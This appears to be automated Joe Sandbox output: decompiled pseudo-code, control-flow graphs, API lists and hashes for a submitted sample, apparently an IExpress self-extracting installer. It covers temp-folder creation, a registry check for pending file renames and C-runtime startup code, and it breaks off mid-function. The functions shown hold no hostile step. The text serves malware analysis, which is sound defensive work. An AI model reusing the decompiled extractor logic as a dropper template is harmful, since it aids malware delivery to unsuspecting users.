                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                          • API String ID: 2436801531-3855382519
                                                                                                                                                                                                          • Opcode ID: 288b08647c1a43e6f953b37916f7192bd899fbb9d31a9076dc5160c517237c51
                                                                                                                                                                                                          • Instruction ID: 2871a1fdbde40467536b88e73e27b83dd64aeb346649e9c1cb40de57e371e31d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 288b08647c1a43e6f953b37916f7192bd899fbb9d31a9076dc5160c517237c51
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36810870A04A149ADB24AB68DC55BEB776DFB60300F0700A5F586E3191EEB48DC58B52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E008653A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                          				CHAR* _t20;
                                                                                                                                                                                                          				int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				CHAR* _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                          				_t32 = __edx;
                                                                                                                                                                                                          				_t20 = __ecx;
                                                                                                                                                                                                          				_t29 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					E0086171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                          					_t34 = _t34 + 0x10;
                                                                                                                                                                                                          					_t29 = _t29 + 1;
                                                                                                                                                                                                          					E00861680(_t32, 0x104, _t20);
                                                                                                                                                                                                          					E0086658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                          					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                          					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t29 < 0x190) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                          						_t30 = 1;
                                                                                                                                                                                                          						DeleteFileA(_t32);
                                                                                                                                                                                                          						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return E00866CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                          				if(_t14 == 0) {
                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t30 = 1;
                                                                                                                                                                                                          				 *0x868a20 = 1;
                                                                                                                                                                                                          				goto L5;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
                                                                                                                                                                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008653FB
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865402
                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086541F
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086542B
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865434
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865452
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                          • API String ID: 1082909758-3862032828
                                                                                                                                                                                                          • Opcode ID: 29fdb1bc582fe9ccf01c8284b8bb7bfaf1755536c6701e4cf56531e8de70ac5a
                                                                                                                                                                                                          • Instruction ID: 8f0b1c430133f1a836f7d183fce444a2b71f2fcfe21d9033555decd6cc1e8a7d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fdb1bc582fe9ccf01c8284b8bb7bfaf1755536c6701e4cf56531e8de70ac5a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4115771300914B7D7249B369C09FAF376DFFD2311F021164F607E2290DEB489428AA7
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 519 86256d-86257d 520 862622-862627 call 8624e0 519->520 521 862583-862589 519->521 526 862629-86262f 520->526 522 86258b 521->522 523 8625e8-862607 RegOpenKeyExA 521->523 525 862591-862595 522->525 522->526 527 8625e3-8625e6 523->527 528 862609-862620 RegQueryInfoKeyA 523->528 525->526 530 86259b-8625ba RegOpenKeyExA 525->530 527->526 531 8625d1-8625dd RegCloseKey 528->531 530->527 532 8625bc-8625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E0086256D(signed int __ecx) {
                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				int _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                          				_t31 = 0;
                                                                                                                                                                                                          				if(_t13 == 0) {
                                                                                                                                                                                                          					_t31 = E008624E0(_t26);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t34 = _t13 - 1;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                          						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                          							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                          							if(_t24 == 0) {
                                                                                                                                                                                                          								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                          								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                          								RegCloseKey(_v12); // executed
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t31 = _v8;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t31;
                                                                                                                                                                                                          				goto L12;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00864096,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?), ref: 008625B2
                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?,00864096), ref: 008625CB
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,00861ED3,00000001,00000000,?,?,00864137,?,00864096), ref: 008625DD
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00864096,00864096,?,00861ED3,00000001,00000000,?,?,00864137,?), ref: 008625FF
                                                                                                                                                                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00864096,00000000,00000000,00000000,00000000,?,00861ED3,00000001,00000000), ref: 0086261A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008625F5
                                                                                                                                                                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 008625A8
                                                                                                                                                                                                          • PendingFileRenameOperations, xrefs: 008625C3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                          • API String ID: 2209512893-559176071
                                                                                                                                                                                                          • Opcode ID: 827dda1c0a5501ea9da9ea15c2ffa6b3f8d6ae122f704b857237aa8c113d4b7c
                                                                                                                                                                                                          • Instruction ID: b4079fda1df6d7f229d13cea93300e9a77d6316fed9cbac928db1be692331c18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 827dda1c0a5501ea9da9ea15c2ffa6b3f8d6ae122f704b857237aa8c113d4b7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26116D35942628FB9B209B92DC0EDFBBE6CFB117A5F124195F809E2110DA705A44DBA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 533 866a60-866a91 call 867155 call 867208 GetStartupInfoW 539 866a93-866aa2 533->539 540 866aa4-866aa6 539->540 541 866abc-866abe 539->541 542 866aaf-866aba Sleep 540->542 543 866aa8-866aad 540->543 544 866abf-866ac5 541->544 542->539 543->544 545 866ac7-866acf _amsg_exit 544->545 546 866ad1-866ad7 544->546 549 866b0b-866b11 545->549 547 866b05 546->547 548 866ad9-866ae9 call 866c3f 546->548 547->549 553 866aee-866af2 548->553 551 866b13-866b24 _initterm 549->551 552 866b2e-866b30 549->552 551->552 554 866b32-866b39 552->554 555 866b3b-866b42 552->555 553->549 556 866af4-866b00 553->556 554->555 557 866b67-866b71 555->557 558 866b44-866b51 call 867060 555->558 560 866c39-866c3e call 86724d 556->560 559 866b74-866b79 557->559 558->557 570 866b53-866b65 558->570 562 866bc5-866bc8 559->562 563 866b7b-866b7d 559->563 566 866bd6-866be3 _ismbblead 562->566 567 866bca-866bd3 562->567 568 866b94-866b98 563->568 569 866b7f-866b81 563->569 572 866be5-866be6 566->572 573 866be9-866bed 566->573 567->566 575 866ba0-866ba2 568->575 576 866b9a-866b9e 568->576 569->562 574 866b83-866b85 569->574 570->557 572->573 573->559 577 866c1e-866c25 573->577 574->568 578 866b87-866b8a 574->578 579 866ba3-866bbc call 862bfb 575->579 576->579 582 866c27-866c2d _cexit 577->582 583 866c32 577->583 578->568 581 866b8c-866b92 578->581 579->577 586 866bbe-866bbf exit 579->586 581->574 582->583 583->560 586->562
                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int* _t25;
                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                          				signed char _t41;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                          				intOrPtr* _t60;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				E00867155();
                                                                                                                                                                                                          				_push(0x58);
                                                                                                                                                                                                          				_push(0x8672b8);
                                                                                                                                                                                                          				E00867208(__ebx, __edi, __esi);
                                                                                                                                                                                                          				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                          				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                          				_t53 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          					if(0 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(0 != _t56) {
                                                                                                                                                                                                          						Sleep(0x3e8);
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t58 = 1;
                                                                                                                                                                                                          						_t53 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                          					_t67 =  *0x8688b0 - _t58; // 0x2
                                                                                                                                                                                                          					if(_t67 != 0) {
                                                                                                                                                                                                          						__eflags =  *0x8688b0; // 0x2
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							 *0x8681e4 = _t58;
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *0x8688b0 = _t58;
                                                                                                                                                                                                          							_t37 = E00866C3F(0x8610b8, 0x8610c4); // executed
                                                                                                                                                                                                          							__eflags = _t37;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                          								_t30 = 0xff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(0x1f);
                                                                                                                                                                                                          						L00866FF4();
                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                          						_t68 =  *0x8688b0 - _t58; // 0x2
                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                          							_push(0x8610b4);
                                                                                                                                                                                                          							_push(0x8610ac);
                                                                                                                                                                                                          							L00867202();
                                                                                                                                                                                                          							 *0x8688b0 = 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t53 == 0) {
                                                                                                                                                                                                          							 *0x8688ac = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t71 =  *0x8688b4;
                                                                                                                                                                                                          						if( *0x8688b4 != 0 && E00867060(_t71, 0x8688b4) != 0) {
                                                                                                                                                                                                          							_t60 =  *0x8688b4; // 0x0
                                                                                                                                                                                                          							 *0x86a288(0, 2, 0);
                                                                                                                                                                                                          							 *_t60();
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                          						_t59 =  *_t25;
                                                                                                                                                                                                          						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t41 =  *_t59;
                                                                                                                                                                                                          							if(_t41 > 0x20) {
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							if(_t41 != 0) {
                                                                                                                                                                                                          								if(_t54 != 0) {
                                                                                                                                                                                                          									goto L32;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                          										_t59 = _t59 + 1;
                                                                                                                                                                                                          										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          										_t41 =  *_t59;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                          								_t29 = 0xa;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push(_t29);
                                                                                                                                                                                                          							_t30 = E00862BFB(0x860000, 0, _t59); // executed
                                                                                                                                                                                                          							 *0x8681e0 = _t30;
                                                                                                                                                                                                          							__eflags =  *0x8681f8;
                                                                                                                                                                                                          							if( *0x8681f8 == 0) {
                                                                                                                                                                                                          								exit(_t30); // executed
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags =  *0x8681e4;
                                                                                                                                                                                                          							if( *0x8681e4 == 0) {
                                                                                                                                                                                                          								__imp___cexit();
                                                                                                                                                                                                          								_t30 =  *0x8681e0; // 0x0
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                          							goto L40;
                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                          							__eflags = _t41 - 0x22;
                                                                                                                                                                                                          							if(_t41 == 0x22) {
                                                                                                                                                                                                          								__eflags = _t54;
                                                                                                                                                                                                          								_t15 = _t54 == 0;
                                                                                                                                                                                                          								__eflags = _t15;
                                                                                                                                                                                                          								_t54 = 0 | _t15;
                                                                                                                                                                                                          								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                          							__imp___ismbblead(_t26);
                                                                                                                                                                                                          							__eflags = _t26;
                                                                                                                                                                                                          							if(_t26 != 0) {
                                                                                                                                                                                                          								_t59 = _t59 + 1;
                                                                                                                                                                                                          								__eflags = _t59;
                                                                                                                                                                                                          								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t59 = _t59 + 1;
                                                                                                                                                                                                          							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L40:
                                                                                                                                                                                                          					return E0086724D(_t30);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t58 = 1;
                                                                                                                                                                                                          				__eflags = 1;
                                                                                                                                                                                                          				goto L7;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x00866b94
                                                                                                                                                                                                          0x00866b98
                                                                                                                                                                                                          0x00866ba2
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866b9a
                                                                                                                                                                                                          0x00866ba3
                                                                                                                                                                                                          0x00866bab
                                                                                                                                                                                                          0x00866bb0
                                                                                                                                                                                                          0x00866bb5
                                                                                                                                                                                                          0x00866bbc
                                                                                                                                                                                                          0x00866bbf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866bbf
                                                                                                                                                                                                          0x00866c1e
                                                                                                                                                                                                          0x00866c25
                                                                                                                                                                                                          0x00866c27
                                                                                                                                                                                                          0x00866c2d
                                                                                                                                                                                                          0x00866c2d
                                                                                                                                                                                                          0x00866c32
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866bc5
                                                                                                                                                                                                          0x00866bc5
                                                                                                                                                                                                          0x00866bc8
                                                                                                                                                                                                          0x00866bcc
                                                                                                                                                                                                          0x00866bce
                                                                                                                                                                                                          0x00866bce
                                                                                                                                                                                                          0x00866bd1
                                                                                                                                                                                                          0x00866bd3
                                                                                                                                                                                                          0x00866bd3
                                                                                                                                                                                                          0x00866bd6
                                                                                                                                                                                                          0x00866bda
                                                                                                                                                                                                          0x00866be1
                                                                                                                                                                                                          0x00866be3
                                                                                                                                                                                                          0x00866be5
                                                                                                                                                                                                          0x00866be5
                                                                                                                                                                                                          0x00866be6
                                                                                                                                                                                                          0x00866be6
                                                                                                                                                                                                          0x00866be9
                                                                                                                                                                                                          0x00866bea
                                                                                                                                                                                                          0x00866bea
                                                                                                                                                                                                          0x00866b74
                                                                                                                                                                                                          0x00866c39
                                                                                                                                                                                                          0x00866c3e
                                                                                                                                                                                                          0x00866c3e
                                                                                                                                                                                                          0x00866abe
                                                                                                                                                                                                          0x00866abe
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00867155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00867182
                                                                                                                                                                                                            • Part of subcall function 00867155: GetCurrentProcessId.KERNEL32 ref: 00867191
                                                                                                                                                                                                            • Part of subcall function 00867155: GetCurrentThreadId.KERNEL32 ref: 0086719A
                                                                                                                                                                                                            • Part of subcall function 00867155: GetTickCount.KERNEL32 ref: 008671A3
                                                                                                                                                                                                            • Part of subcall function 00867155: QueryPerformanceCounter.KERNEL32(?), ref: 008671B8
                                                                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,008672B8,00000058), ref: 00866A7F
                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00866AB4
                                                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 00866AC9
                                                                                                                                                                                                          • _initterm.MSVCRT ref: 00866B1D
                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00866B49
                                                                                                                                                                                                          • exit.KERNELBASE ref: 00866BBF
                                                                                                                                                                                                          • _ismbblead.MSVCRT ref: 00866BDA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 836923961-0
                                                                                                                                                                                                          • Opcode ID: 5c03a0797b3ec54f5067ad6fed5077024d42258690f144ed371b3b97f8d40043
                                                                                                                                                                                                          • Instruction ID: f0cd7225214efeebc5ae83f019f6a41434721a2c0952c268799f9387f8c9d1b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c03a0797b3ec54f5067ad6fed5077024d42258690f144ed371b3b97f8d40043
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D4122309447A9CFDB219B68DC1876A77E1FB44735F27022AE846E3290EFB44C508B82
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 587 8658c8-8658d5 588 8658d8-8658dd 587->588 588->588 589 8658df-8658f1 LocalAlloc 588->589 590 8658f3-865901 call 8644b9 589->590 591 865919-865959 call 861680 call 86658a CreateFileA LocalFree 589->591 594 865906-865910 call 866285 590->594 591->594 601 86595b-86596c CloseHandle GetFileAttributesA 591->601 600 865912-865918 594->600 601->594 602 86596e-865970 601->602 602->594 603 865972-86597b 602->603 603->600
                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E008658C8(intOrPtr* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				signed char _t16;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				intOrPtr* _t27;
                                                                                                                                                                                                          				CHAR* _t33;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t33 = __ecx;
                                                                                                                                                                                                          				_t27 = __ecx;
                                                                                                                                                                                                          				_t23 = __ecx + 1;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t6 =  *_t27;
                                                                                                                                                                                                          					_t27 = _t27 + 1;
                                                                                                                                                                                                          				} while (_t6 != 0);
                                                                                                                                                                                                          				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                                                          					E00861680(_t20, _t36, _t33);
                                                                                                                                                                                                          					E0086658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                          					_v8 = _t10;
                                                                                                                                                                                                          					LocalFree(_t20);
                                                                                                                                                                                                          					_t12 = _v8;
                                                                                                                                                                                                          					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						CloseHandle(_t12);
                                                                                                                                                                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                          						} else {
